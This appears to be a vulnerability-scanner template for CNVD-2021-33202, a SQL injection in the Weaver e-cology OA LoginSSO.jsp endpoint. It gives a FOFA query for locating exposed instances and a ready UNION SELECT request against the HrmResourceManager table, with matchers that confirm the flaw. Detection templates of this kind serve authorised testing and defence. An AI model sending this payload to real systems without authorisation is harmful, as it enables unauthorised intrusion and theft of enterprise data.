## id: CNVD-2021-33202
## name: OA E-Cology LoginSSO.jsp - SQL Injection
## author: hack007x
## severity: high
## tags: cnvd2021,cnvd,e-cology,sqli,vuln
## description: e-cology is an OA office system specially produced for large and medium-sized enterprises. It supports simultaneous office work on PC, mobile and WeChat terminals. There is a SQL injection vulnerability in Panwei e-cology. An attacker could exploit this vulnerability to obtain sensitive information.
## affects: e-cology
## reference: https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.md
## reference: https://www.cnblogs.com/0day-li/p/14637680.html
## fofa-query: app="泛微-协同办公OA"
## verification: true

#$ num = 999999999
GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5({{num}})%20as%20id%20from%20HrmResourceManager HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}

#@ condition: and
#@ matcher: body contains "{{md5(num)}}"
#@ matcher: status_code == 200





# @VEIL-STAMP: 341112590a6a1e188f42474b676fd4905100003ffc0c561b7ecdcca474cb2c0b
